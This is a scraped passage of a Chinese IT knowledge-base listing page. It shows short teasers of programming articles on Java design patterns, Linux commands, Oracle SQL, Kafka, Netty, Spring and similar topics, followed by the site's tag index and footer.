<a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                                    <div>当想要对已有类的对象进行功能增强时，可以定义一个类，将已有对象传入，基于已有的功能，并提供加强功能。 
自定义的类成为装饰类 
 
模仿BufferedReader，对Reader进行包装，体现装饰设计模式 
 
装饰类通常会通过构造方法接受被装饰的对象，并基于被装饰的对象功能，提供更强的功能。 
装饰模式比继承灵活，避免继承臃肿，降低了类与类之间的关系 
 
装饰类因为增强已有对象，具备的功能该</div>
                                </li>
                                <li><a href="/article/553.htm"
                                       title="Linux中的uniq命令" target="_blank">Linux中的uniq命令</a>
                                    <span class="text-muted">被触发</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>Linux命令uniq的作用是过滤重复部分显示文件内容，这个命令读取输入文件，并比较相邻的行。在正常情 况下，第二个及以后更多个重复行将被删去，行比较是根据所用字符集的排序序列进行的。该命令加工后的结果写到输出文件中。输入文件和输出文件必须不同。如 果输入文件用“- ”表示，则从标准输入读取。 
AD： 
uniq [选项] 文件 
说明：这个命令读取输入文件，并比较相邻的行。在正常情况下，第二个</div>
                                </li>
                                <li><a href="/article/680.htm"
                                       title="正则表达式Pattern" target="_blank">正则表达式Pattern</a>
                                    <span class="text-muted">肆无忌惮_</span>
<a class="tag" taget="_blank" href="/search/Pattern/1.htm">Pattern</a>
                                    <div>正则表达式是符合一定规则的表达式，用来专门操作字符串，对字符创进行匹配，切割，替换，获取。 
&nbsp; 
例如，我们需要对QQ号码格式进行检验 
规则是长度6~12位 &nbsp;不能0开头 &nbsp;只能是数字，我们可以一位一位进行比较，利用parseLong进行判断，或者是用正则表达式来匹配[1-9][0-9]{4,14}&nbsp;或者&nbsp;[1-9]\d{4,14} 
&nbs</div>
                                </li>
                                <li><a href="/article/807.htm"
                                       title="Oracle高级查询之OVER (PARTITION BY ..)" target="_blank">Oracle高级查询之OVER (PARTITION BY ..)</a>
                                    <span class="text-muted">知了ing</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                                    <div>一、rank()/dense_rank() over(partition by ...order by ...) 
 
现在客户有这样一个需求，查询每个部门工资最高的雇员的信息，相信有一定oracle应用知识的同学都能写出下面的SQL语句： 
 
 select e.ename, e.job, e.sal, e.deptno  
  from scott.emp e,  
       (se</div>
                                </li>
                                <li><a href="/article/934.htm"
                                       title="Python调试" target="_blank">Python调试</a>
                                    <span class="text-muted">矮蛋蛋</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/pdb/1.htm">pdb</a>
                                    <div>原文地址： 
http://blog.csdn.net/xuyuefei1988/article/details/19399137 
1、下面网上收罗的资料初学者应该够用了，但对比IBM的Python 代码调试技巧： 
 
IBM：包括 pdb 模块、利用 PyDev 和 Eclipse 集成进行调试、PyCharm 以及 Debug 日志进行调试： 
 
http://www.ibm.com/d</div>
                                </li>
                                <li><a href="/article/1061.htm"
                                       title="webservice传递自定义对象时函数为空，以及boolean不对应的问题" target="_blank">webservice传递自定义对象时函数为空，以及boolean不对应的问题</a>
                                    <span class="text-muted">alleni123</span>
<a class="tag" taget="_blank" href="/search/webservice/1.htm">webservice</a>
                                    <div>今天在客户端调用方法 
NodeStatus status=iservice.getNodeStatus(). 
 
结果NodeStatus的属性都是null。 
 
进行debug之后，发现服务器端返回的确实是有值的对象。 
 
后来发现原来是因为在客户端，NodeStatus的setter全部被我删除了。 
本来是因为逻辑上不需要在客户端使用setter， 结果改了之后竟然不能获取带属性值的</div>
                                </li>
                                <li><a href="/article/1188.htm"
                                       title="java如何干掉指针，又如何巧妙的通过引用来操作指针————>说的就是java指针" target="_blank">java如何干掉指针，又如何巧妙的通过引用来操作指针————>说的就是java指针</a>
                                    <span class="text-muted">百合不是茶</span>

                                    <div>C语言的强大在于可以直接操作指针的地址，通过改变指针的地址指向来达到更改地址的目的,又是由于c语言的指针过于强大，初学者很难掌握， java的出现解决了c，c++中指针的问题 java将指针封装在底层，开发人员是不能够去操作指针的地址，但是可以通过引用来间接的操作： 
&nbsp; 
定义一个指针p来指向a的地址（&amp;是地址符号）： 
&nbsp; &nbsp; &nbsp; &nbsp; </div>
                                </li>
                                <li><a href="/article/1315.htm"
                                       title="Eclipse打不开，提示“An error has occurred.See the log file ***/.log”" target="_blank">Eclipse打不开，提示“An error has occurred.See the log file ***/.log”</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a>
                                    <div>打开eclipse工作目录的\.metadata\.log文件，发现如下错误： 
 
!ENTRY org.eclipse.osgi 4 0 2012-09-10 09:28:57.139 
!MESSAGE Application error 
!STACK 1 
java.lang.NoClassDefFoundError: org/eclipse/core/resources/IContai</div>
                                </li>
                                <li><a href="/article/1442.htm"
                                       title="spring aop实例annotation方法实现" target="_blank">spring aop实例annotation方法实现</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/AOP/1.htm">AOP</a><a class="tag" taget="_blank" href="/search/annotation/1.htm">annotation</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在spring aop实例中我们通过配置xml文件来实现AOP，这里学习使用annotation来实现，使用annotation其实就是指明具体的aspect,pointcut和advice。1.申明一个切面(用一个类来实现)在这个切面里,包括了advice和pointcut 
AdviceMethods.jav</div>
                                </li>
                                <li><a href="/article/1569.htm"
                                       title="[Velocity一]Velocity语法基础入门" target="_blank">[Velocity一]Velocity语法基础入门</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/velocity/1.htm">velocity</a>
                                    <div>用户和开发人员参考文档 
http://velocity.apache.org/engine/releases/velocity-1.7/developer-guide.html 
&nbsp; 注释 
1.行级注释## 
2.多行注释#*&nbsp; *# 
&nbsp; 变量定义 
使用$开头的字符串是变量定义，例如$var1, $var2, 
&nbsp; 赋值 
使用#set为变量赋值，例</div>
                                </li>
                                <li><a href="/article/1696.htm"
                                       title="【Kafka十一】关于Kafka的副本管理" target="_blank">【Kafka十一】关于Kafka的副本管理</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/kafka/1.htm">kafka</a>
                                    <div>1. 关于request.required.acks 
&nbsp; 
request.required.acks控制者Producer写请求的什么时候可以确认写成功，默认是0， 
0表示即不进行确认即返回。 
1表示Leader写成功即返回，此时还没有进行写数据同步到其它Follower Partition中 
-1表示根据指定的最少Partition确认后才返回，这个在 
&nbsp; 
Th</div>
                                </li>
                                <li><a href="/article/1823.htm"
                                       title="lua统计nginx内部变量数据" target="_blank">lua统计nginx内部变量数据</a>
                                    <span class="text-muted">ronin47</span>
<a class="tag" taget="_blank" href="/search/lua+nginx%E3%80%80+%E7%BB%9F%E8%AE%A1/1.htm">lua nginx　 统计</a>
                                    <div>server {
    listen 80;
    server_name photo.domain.com;
    location /{set $str $uri;
        content_by_lua '
            local url = ngx.var.uri
            local res = ngx.location.capture(</div>
                                </li>
                                <li><a href="/article/1950.htm"
                                       title="java-11.二叉树中节点的最大距离" target="_blank">java-11.二叉树中节点的最大距离</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>
import java.util.ArrayList;
import java.util.List;


public class MaxLenInBinTree {

	/*
	 a.			1
	 		   /  \
	 		  2    3
	 		 / \  / \
	 		4   5 6  7
	 	max=4	pass &quot;root&quot;
	 </div>
                                </li>
                                <li><a href="/article/2077.htm"
                                       title="Netty源码学习-ReadTimeoutHandler" target="_blank">Netty源码学习-ReadTimeoutHandler</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/netty/1.htm">netty</a>
                                    <div> 
ReadTimeoutHandler的实现思路： 
开启一个定时任务，如果在指定时间内没有接收到消息，则抛出ReadTimeoutException 
这个异常的捕获，在开发中，交给跟在ReadTimeoutHandler后面的ChannelHandler，例如 
 
 

private final ChannelHandler timeoutHandler =
	new ReadTim</div>
                                </li>
                                <li><a href="/article/2204.htm"
                                       title="jquery验证上传文件样式及大小(好用)" target="_blank">jquery验证上传文件样式及大小(好用)</a>
                                    <span class="text-muted">cngolon</span>
<a class="tag" taget="_blank" href="/search/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/1.htm">文件上传</a><a class="tag" taget="_blank" href="/search/jquery%E9%AA%8C%E8%AF%81/1.htm">jquery验证</a>
                                    <div>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
    &lt;script src=&quot;jquery1.8/jquery-1.8.0.</div>
                                </li>
                                <li><a href="/article/2331.htm"
                                       title="浏览器兼容【转】" target="_blank">浏览器兼容【转】</a>
                                    <span class="text-muted">cuishikuan</span>
<a class="tag" taget="_blank" href="/search/css/1.htm">css</a><a class="tag" taget="_blank" href="/search/%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">浏览器</a><a class="tag" taget="_blank" href="/search/IE/1.htm">IE</a>
                                    <div>浏览器兼容问题一：不同浏览器的标签默认的外补丁和内补丁不同 
 
问题症状：随便写几个标签，不加样式控制的情况下，各自的margin 和padding差异较大。 
 
碰到频率:100% 
 
解决方案：CSS里&nbsp;&nbsp;&nbsp; *{margin:0;padding:0;} 
 
备注：这个是最常见的也是最易解决的一个浏览器兼容性问题，几乎所有的CSS文件开头都会用通配符*来设</div>
                                </li>
                                <li><a href="/article/2458.htm"
                                       title="Shell特殊变量：Shell $0, $#, $*, $@, $?, $$和命令行参数" target="_blank">Shell特殊变量：Shell $0, $#, $*, $@, $?, $$和命令行参数</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/shell/1.htm">shell</a><a class="tag" taget="_blank" href="/search/%24%23/1.htm">$#</a><a class="tag" taget="_blank" href="/search/%24%3F/1.htm">$?</a><a class="tag" taget="_blank" href="/search/%E7%89%B9%E6%AE%8A%E5%8F%98%E9%87%8F/1.htm">特殊变量</a>
                                    <div>前面已经讲到，变量名只能包含数字、字母和下划线，因为某些包含其他字符的变量有特殊含义，这样的变量被称为特殊变量。例如，$ 表示当前Shell进程的ID，即pid，看下面的代码：   
 
  $echo $$  
   
运行结果 
29949 
&nbsp;  特殊变量列表   变量 含义   $0 当前脚本的文件名   $n 传递给脚本或函数的参数。n 是一个数字，表示第几个参数。例如，第一个</div>
                                </li>
                                <li><a href="/article/2585.htm"
                                       title="程序设计KISS 原则-------KEEP IT SIMPLE, STUPID!" target="_blank">程序设计KISS 原则-------KEEP IT SIMPLE, STUPID!</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/unix/1.htm">unix</a>
                                    <div>翻到一本书，讲到编程一般原则是kiss：Keep It Simple, Stupid.对这个原则深有体会，其实不仅编程如此，而且系统架构也是如此。 
 KEEP IT SIMPLE, STUPID! 编写只做一件事情，并且要做好的程序；编写可以在一起工作的程序，编写处理文本流的程序，因为这是通用的接口。这就是UNIX哲学.所有的哲学真 正的浓缩为一个铁一样的定律，高明的工程师的神圣的“KISS 原</div>
                                </li>
                                <li><a href="/article/2712.htm"
                                       title="android Activity间List传值" target="_blank">android Activity间List传值</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/Activity/1.htm">Activity</a>
                                    <div>第一个Activity： 
import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import android.app.Activity;import android.content.Intent;import android.os.Bundle;import a</div>
                                </li>
                                <li><a href="/article/2839.htm"
                                       title="tomcat 设置java虚拟机内存" target="_blank">tomcat 设置java虚拟机内存</a>
                                    <span class="text-muted">eksliang</span>
<a class="tag" taget="_blank" href="/search/tomcat+%E5%86%85%E5%AD%98%E8%AE%BE%E7%BD%AE/1.htm">tomcat 内存设置</a>
                                    <div>转载请出自出处：http://eksliang.iteye.com/blog/2117772 
http://eksliang.iteye.com/ 
常见的内存溢出有以下两种: 
java.lang.OutOfMemoryError: PermGen space  
java.lang.OutOfMemoryError: Java heap space 
&nbsp; 
------------</div>
                                </li>
                                <li><a href="/article/2966.htm"
                                       title="Android 数据库事务处理" target="_blank">Android 数据库事务处理</a>
                                    <span class="text-muted">gqdy365</span>
<a class="tag" taget="_blank" href="/search/android/1.htm">android</a>
                                    <div>使用SQLiteDatabase的beginTransaction()方法可以开启一个事务，程序执行到endTransaction() 方法时会检查事务的标志是否为成功，如果程序执行到endTransaction()之前调用了setTransactionSuccessful() 方法设置事务的标志为成功则提交事务，如果没有调用setTransactionSuccessful() 方法则回滚事务。事</div>
                                </li>
                                <li><a href="/article/3093.htm"
                                       title="Java 打开浏览器" target="_blank">Java 打开浏览器</a>
                                    <span class="text-muted">hw1287789687</span>
<a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80%E7%BD%91%E5%9D%80/1.htm">打开网址</a><a class="tag" taget="_blank" href="/search/open%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">open浏览器</a><a class="tag" taget="_blank" href="/search/open+browser/1.htm">open browser</a><a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80url/1.htm">打开url</a><a class="tag" taget="_blank" href="/search/%E6%89%93%E5%BC%80%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">打开浏览器</a>
                                    <div>使用java 语言如何打开浏览器呢? 
我们先研究下在cmd窗口中,如何打开网址 
使用IE 打开 
D:\software\bin&gt;cmd /c start iexplore http://hw1287789687.iteye.com/blog/2153709 
使用火狐打开 
D:\software\bin&gt;cmd /c start firefox http://hw1287789</div>
                                </li>
                                <li><a href="/article/3220.htm"
                                       title="ReplaceGoogleCDN：将 Google CDN 替换为国内的 Chrome 插件" target="_blank">ReplaceGoogleCDN：将 Google CDN 替换为国内的 Chrome 插件</a>
                                    <span class="text-muted">justjavac</span>
<a class="tag" taget="_blank" href="/search/chrome/1.htm">chrome</a><a class="tag" taget="_blank" href="/search/Google/1.htm">Google</a><a class="tag" taget="_blank" href="/search/google+api/1.htm">google api</a><a class="tag" taget="_blank" href="/search/chrome%E6%8F%92%E4%BB%B6/1.htm">chrome插件</a>
                                    <div>Chrome Web Store 安装地址：&nbsp;https://chrome.google.com/webstore/detail/replace-google-cdn/kpampjmfiopfpkkepbllemkibefkiice 
 
 由于众所周知的原因，只需替换一个域名就可以继续使用Google提供的前端公共库了。 同样，通过script标记引用这些资源，让网站访问速度瞬间提速吧</div>
                                </li>
                                <li><a href="/article/3347.htm"
                                       title="进程VS.线程" target="_blank">进程VS.线程</a>
                                    <span class="text-muted">m635674608</span>
<a class="tag" taget="_blank" href="/search/%E7%BA%BF%E7%A8%8B/1.htm">线程</a>
                                    <div>资料来源： 
http://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001397567993007df355a3394da48f0bf14960f0c78753f000 1、Apache最早就是采用多进程模式 2、IIS服务器默认采用多线程模式 3、多进程优缺点 优点： 
多进程模式最大</div>
                                </li>
                                <li><a href="/article/3474.htm"
                                       title="Linux下安装MemCached" target="_blank">Linux下安装MemCached</a>
                                    <span class="text-muted">字符串</span>
<a class="tag" taget="_blank" href="/search/memcached/1.htm">memcached</a>
                                    <div>前提准备：1. MemCached目前最新版本为：1.4.22，可以从官网下载到。2. MemCached依赖libevent，因此在安装MemCached之前需要先安装libevent。2.1 运行下面命令，查看系统是否已安装libevent。[root@SecurityCheck ~]# rpm -qa|grep libevent libevent-headers-1.4.13-4.el6.n</div>
                                </li>
                                <li><a href="/article/3601.htm"
                                       title="java设计模式之--jdk动态代理（实现aop编程）" target="_blank">java设计模式之--jdk动态代理（实现aop编程）</a>
                                    <span class="text-muted">Supanccy2013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/DAO/1.htm">DAO</a><a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a><a class="tag" taget="_blank" href="/search/AOP/1.htm">AOP</a>
                                    <div>&nbsp;&nbsp;&nbsp; 与静态代理类对照的是动态代理类，动态代理类的字节码在程序运行时由Java反射机制动态生成，无需程序员手工编写它的源代码。动态代理类不仅简化了编程工作，而且提高了软件系统的可扩展性，因为Java 反射机制可以生成任意类型的动态代理类。java.lang.reflect 包中的Proxy类和InvocationHandler 接口提供了生成动态代理类的能力。 
&</div>
                                </li>
                                <li><a href="/article/3728.htm"
                                       title="Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持" target="_blank">Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持</a>
                                    <span class="text-muted">wiselyman</span>
<a class="tag" taget="_blank" href="/search/spring+4/1.htm">spring 4</a>
                                    <div>2.1 默认方法(default method) 
 
 java8引入了一个default medthod; 
 用来扩展已有的接口,在对已有接口的使用不产生任何影响的情况下,添加扩展 
 使用default关键字 
 Spring 4.2支持加载在默认方法里声明的bean 
  
2.2 
 
 将要被声明成bean的类 
  
public class DemoService {
    </div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>